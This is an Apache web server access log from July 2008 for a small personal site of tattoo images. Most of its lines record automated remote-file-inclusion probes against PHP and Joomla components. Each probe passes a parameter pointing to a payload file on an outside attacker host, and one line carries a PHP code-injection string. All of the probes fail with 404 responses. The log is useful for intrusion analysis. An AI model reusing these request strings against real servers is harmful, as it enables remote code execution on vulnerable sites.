69.44.197.193 - - [30/Jul/2008:19:18:36 -0500] "GET /tattoo/tattoo1.htm HTTP/1.1" 200 3776 "http://images.google.com/imgres?imgurl=http://tomdolan.pconline.com/tattoo/tat_1st.JPG&imgrefurl=http://tomdolan.pconline.com/tattoo/tattoo1.htm&h=228&w=271&sz=17&hl=en&start=348&um=1&tbnid=4MDwc_2CKpvGqM:&tbnh=95&tbnw=113&prev=/images%3Fq%3Dold%2Bschool%2Btattoo%2Bflash%26start%3D336%26ndsp%3D21%26um%3D1%26hl%3Den%26sa%3DN""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
69.44.197.193 - - [30/Jul/2008:19:18:36 -0500] "GET /tattoo/tat_1st.JPG HTTP/1.1" 200 16480 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
69.44.197.193 - - [30/Jul/2008:19:18:36 -0500] "GET /tattoo/webring.jpg HTTP/1.1" 200 13114 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
200.146.61.130 - - [30/Jul/2008:19:18:48 -0500] "GET /logs/include/status.inc.php?tm_includepath=http://www.doxgroup.com/egroupware/did.txt?? HTTP/1.1" 404 311 "-""libwww-perl/5.79"
200.146.61.130 - - [30/Jul/2008:19:18:48 -0500] "GET /include/status.inc.php?tm_includepath=http://www.doxgroup.com/egroupware/did.txt?? HTTP/1.1" 404 306 "-""libwww-perl/5.79"
69.44.197.193 - - [30/Jul/2008:19:18:51 -0500] "GET /tattoo/set4.htm HTTP/1.1" 200 1762 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
69.44.197.193 - - [30/Jul/2008:19:18:51 -0500] "GET /tattoo/tatd1.JPG HTTP/1.1" 200 14507 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
69.44.197.193 - - [30/Jul/2008:19:18:51 -0500] "GET /tattoo/tatd2.JPG HTTP/1.1" 200 14891 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
69.44.197.193 - - [30/Jul/2008:19:18:52 -0500] "GET /tattoo/tatd3.JPG HTTP/1.1" 200 12386 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
69.44.197.193 - - [30/Jul/2008:19:18:52 -0500] "GET /tattoo/tatd4.JPG HTTP/1.1" 200 12068 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
69.44.197.193 - - [30/Jul/2008:19:18:52 -0500] "GET /tattoo/tatd6.JPG HTTP/1.1" 200 12059 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
69.44.197.193 - - [30/Jul/2008:19:18:52 -0500] "GET /tattoo/tatd7.JPG HTTP/1.1" 200 20479 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
69.44.197.193 - - [30/Jul/2008:19:18:53 -0500] "GET /tattoo/tatd10.JPG HTTP/1.1" 200 19089 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
69.44.197.193 - - [30/Jul/2008:19:18:53 -0500] "GET /tattoo/msameric.JPG HTTP/1.1" 200 14283 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
69.44.197.193 - - [30/Jul/2008:19:18:53 -0500] "GET /tattoo/tatd9.JPG HTTP/1.1" 200 17368 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
69.44.197.193 - - [30/Jul/2008:19:18:53 -0500] "GET /tattoo/tatd8.JPG HTTP/1.1" 200 13038 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
69.44.197.193 - - [30/Jul/2008:19:19:14 -0500] "GET /tattoo/bonus.htm HTTP/1.1" 200 808 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
69.44.197.193 - - [30/Jul/2008:19:19:14 -0500] "GET /tattoo/tate4.JPG HTTP/1.1" 200 18555 "http://tomdolan.pconline.com/tattoo/bonus.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
69.44.197.193 - - [30/Jul/2008:19:19:14 -0500] "GET /tattoo/tate2.JPG HTTP/1.1" 200 13891 "http://tomdolan.pconline.com/tattoo/bonus.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
69.44.197.193 - - [30/Jul/2008:19:19:15 -0500] "GET /tattoo/tate3.JPG HTTP/1.1" 200 16409 "http://tomdolan.pconline.com/tattoo/bonus.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)"
80.231.0.98 - - [30/Jul/2008:19:19:39 -0500] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://geocities.com/rais_corp/cmd.txt? HTTP/1.1" 404 348 "-""libwww-perl/5.79"
80.231.0.98 - - [30/Jul/2008:19:19:40 -0500] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://geocities.com/rais_corp/cmd.txt? HTTP/1.1" 404 343 "-""libwww-perl/5.79"
72.243.169.10 - - [30/Jul/2008:19:22:38 -0500] "GET //components/com_flyspray/startdown.php?file=http://legalref.ru/config/idfx.txt?? HTTP/1.1" 404 322 "-""Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)"
72.243.169.10 - - [30/Jul/2008:19:22:38 -0500] "GET /logs/access_log.1216425600//components/com_flyspray/startdown.php?file=http://legalref.ru/config/idfx.txt?? HTTP/1.1" 404 349 "-""Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)"
72.243.169.10 - - [30/Jul/2008:19:22:38 -0500] "GET /logs//components/com_flyspray/startdown.php?file=http://legalref.ru/config/idfx.txt?? HTTP/1.1" 404 327 "-""Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)"
72.243.169.10 - - [30/Jul/2008:19:22:39 -0500] "GET /logs/access_log.1214697600//components/com_flyspray/startdown.php?file=http://legalref.ru/config/idfx.txt?? HTTP/1.1" 404 349 "-""Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)"
202.181.236.33 - - [30/Jul/2008:19:28:29 -0500] "GET /logs/components/com_facileforms/facileforms.frame.php?ff_compath=http://www.proostjes.be/calendar/help01.txt??????? HTTP/1.1" 404 337 "-""libwww-perl/5.803"
202.181.236.33 - - [30/Jul/2008:19:28:29 -0500] "GET /components/com_facileforms/facileforms.frame.php?ff_compath=http://www.proostjes.be/calendar/help01.txt??????? HTTP/1.1" 404 332 "-""libwww-perl/5.803"
69.94.56.6 - - [30/Jul/2008:19:29:03 -0500] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.goldenfirstumc.org/sistem.txt?? HTTP/1.0" 404 324 "-""libwww-perl/5.48"
69.94.56.6 - - [30/Jul/2008:19:29:03 -0500] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.goldenfirstumc.org/sistem.txt?? HTTP/1.0" 404 319 "-""libwww-perl/5.48"
67.15.186.5 - - [30/Jul/2008:19:29:52 -0500] "GET /logs/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://aaa-hack.fateback.com/id2.txt??? HTTP/1.1" 404 323 "-""libwww-perl/5.65"
67.15.186.5 - - [30/Jul/2008:19:29:52 -0500] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://aaa-hack.fateback.com/id2.txt??? HTTP/1.1" 404 318 "-""libwww-perl/5.65"
67.15.186.5 - - [30/Jul/2008:19:30:01 -0500] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://aaa-hack.fateback.com/id2.txt??? HTTP/1.1" 404 318 "-""libwww-perl/5.65"
67.15.186.5 - - [30/Jul/2008:19:30:01 -0500] "GET /logs/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://aaa-hack.fateback.com/id2.txt??? HTTP/1.1" 404 323 "-""libwww-perl/5.65"
200.146.61.130 - - [30/Jul/2008:19:31:34 -0500] "GET /logs/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://sujianto.com/id.txt%0D?? HTTP/1.1" 404 323 "-""libwww-perl/5.79"
200.146.61.130 - - [30/Jul/2008:19:31:34 -0500] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://sujianto.com/id.txt%0D?? HTTP/1.1" 404 318 "-""libwww-perl/5.79"
141.85.101.1 - - [30/Jul/2008:19:31:54 -0500] "GET /logs/scanhttp://www.abunaissa.de/ooid.txt?? HTTP/1.1" 404 325 "-""libwww-perl/5.805"
141.85.101.1 - - [30/Jul/2008:19:31:54 -0500] "GET /scanhttp://www.abunaissa.de/ooid.txt?? HTTP/1.1" 404 320 "-""libwww-perl/5.805"
141.85.101.1 - - [30/Jul/2008:19:31:54 -0500] "GET /logs/scanhttp://www.abunaissa.de/ooid.txt?? HTTP/1.1" 404 325 "-""libwww-perl/5.805"
141.85.101.1 - - [30/Jul/2008:19:31:54 -0500] "GET /scanhttp://www.abunaissa.de/ooid.txt?? HTTP/1.1" 404 320 "-""libwww-perl/5.805"
201.130.79.132 - - [30/Jul/2008:19:32:36 -0500] "GET /logs/components/com_facileforms/facileforms.frame.php?ff_compath=http://geo.ya.com/v3g3t4/x6/id.txt??? HTTP/1.1" 404 337 "-""libwww-perl/5.805"
201.130.79.132 - - [30/Jul/2008:19:32:36 -0500] "GET /components/com_facileforms/facileforms.frame.php?ff_compath=http://geo.ya.com/v3g3t4/x6/id.txt??? HTTP/1.1" 404 332 "-""libwww-perl/5.805"
62.112.193.46 - - [30/Jul/2008:19:32:37 -0500] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 365 "-""libwww-perl/5.805"
62.112.193.46 - - [30/Jul/2008:19:32:37 -0500] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 360 "-""libwww-perl/5.805"
212.241.217.251 - - [30/Jul/2008:19:34:41 -0500] "GET /logs//index.php?DOCUMENT_ROOT=http://www.adoradores.kit.net/alb?? HTTP/1.1" 404 299 "-""libwww-perl/5.803"
212.241.217.251 - - [30/Jul/2008:19:34:41 -0500] "GET //index.php?DOCUMENT_ROOT=http://www.adoradores.kit.net/alb?? HTTP/1.1" 404 294 "-""libwww-perl/5.803"
74.220.163.9 - - [30/Jul/2008:19:34:58 -0500] "GET /logs//s_e404.php?DOCUMENT_ROOT=http://www.hs-prutz.tsn.at/cache/id.txt?? HTTP/1.1" 404 300 "-""libwww-perl/5.79"
74.220.163.9 - - [30/Jul/2008:19:34:58 -0500] "GET //s_e404.php?DOCUMENT_ROOT=http://www.hs-prutz.tsn.at/cache/id.txt?? HTTP/1.1" 404 295 "-""libwww-perl/5.79"
74.220.163.9 - - [30/Jul/2008:19:35:06 -0500] "GET /logs//e404.php?DOCUMENT_ROOT=http://www.hs-prutz.tsn.at/cache/id.txt?? HTTP/1.1" 404 298 "-""libwww-perl/5.79"
74.220.163.9 - - [30/Jul/2008:19:35:06 -0500] "GET //e404.php?DOCUMENT_ROOT=http://www.hs-prutz.tsn.at/cache/id.txt?? HTTP/1.1" 404 293 "-""libwww-perl/5.79"
67.15.186.5 - - [30/Jul/2008:19:35:55 -0500] "GET /logs/access_log.1215993600/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://legalref.ru/config/idfx.txt?? HTTP/1.1" 404 345 "-""Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)"
67.15.186.5 - - [30/Jul/2008:19:35:55 -0500] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://legalref.ru/config/idfx.txt?? HTTP/1.1" 404 318 "-""Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)"
67.15.186.5 - - [30/Jul/2008:19:35:55 -0500] "GET /logs/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://legalref.ru/config/idfx.txt?? HTTP/1.1" 404 323 "-""Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)"
67.15.186.5 - - [30/Jul/2008:19:35:55 -0500] "GET /logs/access_log.1215043200/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://legalref.ru/config/idfx.txt?? HTTP/1.1" 404 345 "-""Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)"
83.12.119.178 - - [30/Jul/2008:19:43:12 -0500] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=uid=48(apache)%20gid=48(apache)%20groups=48(apache)%0A? HTTP/1.1" 404 320 "-""libwww-perl/5.65"
85.10.128.148 - - [30/Jul/2008:19:44:27 -0500] "GET //index.php?dept=http://www.doxgroup.com/egroupware/did.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.805"
85.10.128.148 - - [30/Jul/2008:19:44:28 -0500] "GET /logs//index.php?dept=http://www.doxgroup.com/egroupware/did.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
210.245.166.92 - - [30/Jul/2008:19:45:00 -0500] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.adoradores.kit.net/general? HTTP/1.1" 404 326 "-""libwww-perl/5.79"
210.245.166.92 - - [30/Jul/2008:19:45:01 -0500] "GET //ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.adoradores.kit.net/general? HTTP/1.1" 404 321 "-""libwww-perl/5.79"
81.0.228.184 - - [30/Jul/2008:19:45:33 -0500] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://aaa-hack.fateback.com/id2.txt??? HTTP/1.1" 404 318 "-""libwww-perl/5.805"
81.0.228.184 - - [30/Jul/2008:19:45:33 -0500] "GET /logs/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://aaa-hack.fateback.com/id2.txt??? HTTP/1.1" 404 323 "-""libwww-perl/5.805"
80.67.17.37 - - [30/Jul/2008:19:47:35 -0500] "GET /logs//config/dbutil.bck.php?confdir=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 311 "-""libwww-perl/5.808"
80.67.17.37 - - [30/Jul/2008:19:47:35 -0500] "GET //config/dbutil.bck.php?confdir=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 306 "-""libwww-perl/5.808"
200.146.61.130 - - [30/Jul/2008:19:47:55 -0500] "GET /logs//index.php?dept=http://www.doxgroup.com/egroupware/did.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.79"
200.146.61.130 - - [30/Jul/2008:19:47:55 -0500] "GET //index.php?dept=http://www.doxgroup.com/egroupware/did.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.79"
72.52.131.56 - - [30/Jul/2008:19:48:06 -0500] "GET /logs//config/dbutil.bck.php?confdir=http://aaa-hack.fateback.com/id2.txt? HTTP/1.1" 404 311 "-""libwww-perl/5.811"
72.52.131.56 - - [30/Jul/2008:19:48:06 -0500] "GET //config/dbutil.bck.php?confdir=http://aaa-hack.fateback.com/id2.txt? HTTP/1.1" 404 306 "-""libwww-perl/5.811"
209.90.77.31 - - [30/Jul/2008:19:48:14 -0500] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.doxgroup.com/egroupware/did.txt?? HTTP/1.1" 404 318 "-""libwww-perl/5.810"
209.90.77.31 - - [30/Jul/2008:19:48:14 -0500] "GET /logs/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.doxgroup.com/egroupware/did.txt?? HTTP/1.1" 404 323 "-""libwww-perl/5.810"
62.244.71.72 - - [30/Jul/2008:19:48:15 -0500] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://legalref.ru/config/idfx.txt?? HTTP/1.1" 404 318 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1"
62.244.71.72 - - [30/Jul/2008:19:48:15 -0500] "GET /logs/access_log.1215993600/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://legalref.ru/config/idfx.txt?? HTTP/1.1" 404 345 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1"
62.244.71.72 - - [30/Jul/2008:19:48:15 -0500] "GET /logs/access_log.1215043200/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://legalref.ru/config/idfx.txt?? HTTP/1.1" 404 345 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1"
62.244.71.72 - - [30/Jul/2008:19:48:15 -0500] "GET /logs/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://legalref.ru/config/idfx.txt?? HTTP/1.1" 404 323 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1"
72.52.131.56 - - [30/Jul/2008:19:48:17 -0500] "GET /logs//config/dbutil.bck.php?confdir=http://aaa-hack.fateback.com/id2.txt? HTTP/1.1" 404 311 "-""libwww-perl/5.811"
72.52.131.56 - - [30/Jul/2008:19:48:17 -0500] "GET //config/dbutil.bck.php?confdir=http://aaa-hack.fateback.com/id2.txt? HTTP/1.1" 404 306 "-""libwww-perl/5.811"
209.90.77.31 - - [30/Jul/2008:19:48:46 -0500] "GET /logs/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.doxgroup.com/egroupware/did.txt?? HTTP/1.1" 404 323 "-""libwww-perl/5.810"
209.90.77.31 - - [30/Jul/2008:19:48:47 -0500] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.doxgroup.com/egroupware/did.txt?? HTTP/1.1" 404 318 "-""libwww-perl/5.810"
81.198.180.10 - - [30/Jul/2008:19:48:56 -0500] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://tsunamibot.t35.com/on.txt?? HTTP/1.1" 404 336 "-""libwww-perl/5.805"
85.214.59.54 - - [30/Jul/2008:19:48:59 -0500] "GET /logs//config/dbutil.bck.php?confdir=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 311 "-""libwww-perl/5.803"
85.214.59.54 - - [30/Jul/2008:19:48:59 -0500] "GET //config/dbutil.bck.php?confdir=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 306 "-""libwww-perl/5.803"
81.198.180.10 - - [30/Jul/2008:19:48:59 -0500] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://tsunamibot.t35.com/on.txt?? HTTP/1.1" 404 336 "-""libwww-perl/5.805"
81.198.180.10 - - [30/Jul/2008:19:49:00 -0500] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://tsunamibot.t35.com/on.txt?? HTTP/1.1" 404 331 "-""libwww-perl/5.805"
81.198.180.10 - - [30/Jul/2008:19:49:25 -0500] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://tsunamibot.t35.com/on.txt?? HTTP/1.1" 404 336 "-""libwww-perl/5.805"
81.198.180.10 - - [30/Jul/2008:19:49:26 -0500] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://tsunamibot.t35.com/on.txt?? HTTP/1.1" 404 331 "-""libwww-perl/5.805"
81.0.228.184 - - [30/Jul/2008:19:49:32 -0500] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://legalref.ru/config/idfx.txt?? HTTP/1.1" 404 318 "-""Microsoft Internet Explorer/4.0b1 (Windows 95)"
81.0.228.184 - - [30/Jul/2008:19:49:32 -0500] "GET /logs/access_log.1215043200/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://legalref.ru/config/idfx.txt?? HTTP/1.1" 404 345 "-""Microsoft Internet Explorer/4.0b1 (Windows 95)"
81.0.228.184 - - [30/Jul/2008:19:49:32 -0500] "GET /logs/access_log.1215993600/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://legalref.ru/config/idfx.txt?? HTTP/1.1" 404 345 "-""Microsoft Internet Explorer/4.0b1 (Windows 95)"
81.0.228.184 - - [30/Jul/2008:19:49:32 -0500] "GET /logs/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://legalref.ru/config/idfx.txt?? HTTP/1.1" 404 323 "-""Microsoft Internet Explorer/4.0b1 (Windows 95)"
85.17.200.140 - - [30/Jul/2008:19:49:45 -0500] "GET /logs/access_log.1212883200/errors.php?error=http://gaara99.t35.com/c/id.txt? HTTP/1.1" 404 321 "-""libwww-perl/5.810"
85.17.200.140 - - [30/Jul/2008:19:49:46 -0500] "GET /errors.php?error=http://gaara99.t35.com/c/id.txt? HTTP/1.1" 404 294 "-""libwww-perl/5.810"
85.17.200.140 - - [30/Jul/2008:19:49:46 -0500] "GET /logs/errors.php?error=http://gaara99.t35.com/c/id.txt? HTTP/1.1" 404 299 "-""libwww-perl/5.810"
221.144.12.141 - - [30/Jul/2008:19:50:12 -0500] "GET //config/dbutil.bck.php?confdir=http://aaa-hack.fateback.com/id2.txt? HTTP/1.1" 404 306 "-""libwww-perl/5.79"
206.130.11.80 - - [30/Jul/2008:19:50:16 -0500] "GET /logs/vwar/includes/functions_install.php//modules/vwar/admin/admin.php?vwar_root=http://www.sv-haslach.com/modules/.../sistem.txt??? HTTP/1.1" 404 354 "-""libwww-perl/5.79"
206.130.11.80 - - [30/Jul/2008:19:50:21 -0500] "GET /vwar/includes/functions_install.php//modules/vwar/admin/admin.php?vwar_root=http://www.sv-haslach.com/modules/.../sistem.txt??? HTTP/1.1" 404 349 "-""libwww-perl/5.79"
202.181.236.33 - - [30/Jul/2008:19:50:44 -0500] "GET /logs/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.proostjes.be/calendar/help01.txt??????? HTTP/1.1" 404 323 "-""libwww-perl/5.803"
202.181.236.33 - - [30/Jul/2008:19:50:44 -0500] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.proostjes.be/calendar/help01.txt??????? HTTP/1.1" 404 318 "-""libwww-perl/5.803"
205.234.198.174 - - [30/Jul/2008:19:51:07 -0500] "GET /logs/access_log.1213142400//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://tsunamibot.t35.com/off2.txt??? HTTP/1.1" 404 358 "-""libwww-perl/5.810"
205.234.198.174 - - [30/Jul/2008:19:51:07 -0500] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://tsunamibot.t35.com/off2.txt??? HTTP/1.1" 404 331 "-""libwww-perl/5.810"
205.234.198.174 - - [30/Jul/2008:19:51:07 -0500] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://tsunamibot.t35.com/off2.txt??? HTTP/1.1" 404 336 "-""libwww-perl/5.810"
58.65.228.5 - - [30/Jul/2008:19:53:41 -0500] "GET /logs//poll/comments.php?id=%7B$%7Binclude($ddd)%7D%http://www.apnic.net/index.html? HTTP/1.0" 404 295 "-""Mozilla/5.0"
190.81.184.98 - - [30/Jul/2008:19:54:15 -0500] "GET /logs/access_log.1213315200%22%20%20lang=%22it%22%3Etomdolan.pconline.com/logs/access_log.1213315200%3C/a%3E%3C/h3%3E%20-%20%3Ca%20href=%22http:/66.218.71.231/language/translation/translatedPage.php?tt=url&text=http%3A%2F%2Ftomdolan.pconline.com%2Flogs%2Faccess_log.1213315200&lp=it_en&.intl=us&fr=sfp%22%20target=%22_blank%22%3ETranslate%3C/a%3E%20%3C/div%3E%3Cdiv%20class=%22abstr%22%20lang=%22it%22%3E...%20logs/modules/vwar/admin/admin.php?vwar_root=http:/www.tripiwarez.%20...%20%22GET%20/modules/vwar/admin/admin.php?vwar_root=http:/www.tripiwarez.eu/mrneti.txt?%20...%3C/div%3E%3Cspan%20class=url%3Etomdolan.pconline.com/logs/access_%3Cwbr%20/%3Elog.1213315200%3C/span%3E%20-%20%3Cem%3E340k%3C/em%3E%3C/div%3E%3C/li%3E%3Cli%3E%3Cdiv%20class=%22res%22%3E%3Cdiv%3E%3Ch3%3E%3Ca%20class=%22yschttl%22%20href=%22http:/rds.yahoo.com/_ylt=A0geu7zaCZFIqZQAQAFXNyoA;_ylu=X3oDMTB0NGlkaGM2BHNlYwNzcgRwb3MDODI5BGNvbG8DYWMyBHZ0aWQD/SIG=11k694ihf/EXP=1217551194/**http%3a/www.rayfcu.org/access_log/vwar/includes/functions_install.php//modules/vwar/admin/admin.php?vwar_root=http://www.sv-haslach.com/modules/.../sistem.txt??? HTTP/1.1" 404 469 "-""libwww-perl/5.805"
190.81.184.98 - - [30/Jul/2008:19:54:15 -0500] "GET /vwar/includes/functions_install.php//modules/vwar/admin/admin.php?vwar_root=http://www.sv-haslach.com/modules/.../sistem.txt??? HTTP/1.1" 404 349 "-""libwww-perl/5.805"
190.81.184.98 - - [30/Jul/2008:19:54:16 -0500] "GET /logs/access_log.1213315200%22%20%20lang=%22it%22%3Etomdolan.pconline.com/logs/access_log.1213315200%3C/a%3E%3C/h3%3E%20-%20%3Ca%20href=%22http:/66.218.71.231/language/translation/translatedPage.php?tt=url&text=http%3A%2F%2Ftomdolan.pconline.com%2Flogs%2Faccess_log.1213315200&lp=it_en&.intl=us&fr=sfp%22%20target=%22_blank%22%3ETranslate%3C/a%3E%20%3C/div%3E%3Cdiv%20class=%22abstr%22%20lang=%22it%22%3E...%20logs/modules/vwar/admin/admin.php?vwar_root=http:/www.tripiwarez.%20...%20%22GET%20/modules/vwar/admin/admin.php?vwar_root=http:/www.tripiwarez.eu/mrneti.txt?%20...%3C/div%3E%3Cspan%20class=url%3Etomdolan.pconline.com/logs/access_%3Cwbr%20/%3Elog.1213315200%3C/span%3E%20-%20%3Cem%3E340k%3C/em%3E%3C/div%3E%3C/li%3E%3Cli%3E%3Cdiv%20class=%22res%22%3E%3Cdiv%3E%3Ch3%3E%3Ca%20class=%22yschttl%22%20href=%22http:/rds.yahoo.com/_ylt=A0geu7zaCZFIqZQAQAFXNyoA;_ylu=X3oDMTB0NGlkaGM2BHNlYwNzcgRwb3MDODI5BGNvbG8DYWMyBHZ0aWQD/SIG=11k694ihf/EXP=1217551194/**http%3a/www.rayfcu.org/vwar/includes/functions_install.php//modules/vwar/admin/admin.php?vwar_root=http://www.sv-haslach.com/modules/.../sistem.txt??? HTTP/1.1" 404 469 "-""libwww-perl/5.805"
58.65.228.5 - - [30/Jul/2008:19:54:55 -0500] "GET /logs//poll/comments.php?id=%7B$%7Binclude($ddd)%7D%http://www.apnic.net/index.html? HTTP/1.0" 404 295 "-""Mozilla/5.0"
88.214.192.29 - - [30/Jul/2008:19:55:07 -0500] "GET /logs/access_log.1213315200%20%20//?path%5Bdocroot%5D=http://www.fieldpaoli.com/images/id.txt? HTTP/1.1" 404 314 "-""libwww-perl/5.808"
63.208.74.34 - - [30/Jul/2008:19:56:14 -0500] "GET /logs/allinurl:mod.php?mod=siteinfo&id=http://69.13.92.203/sistem.txt?? HTTP/1.1" 404 305 "-""libwww-perl/5.79"
63.208.74.34 - - [30/Jul/2008:19:56:15 -0500] "GET /allinurl:mod.php?mod=siteinfo&id=http://69.13.92.203/sistem.txt?? HTTP/1.1" 404 300 "-""libwww-perl/5.79"
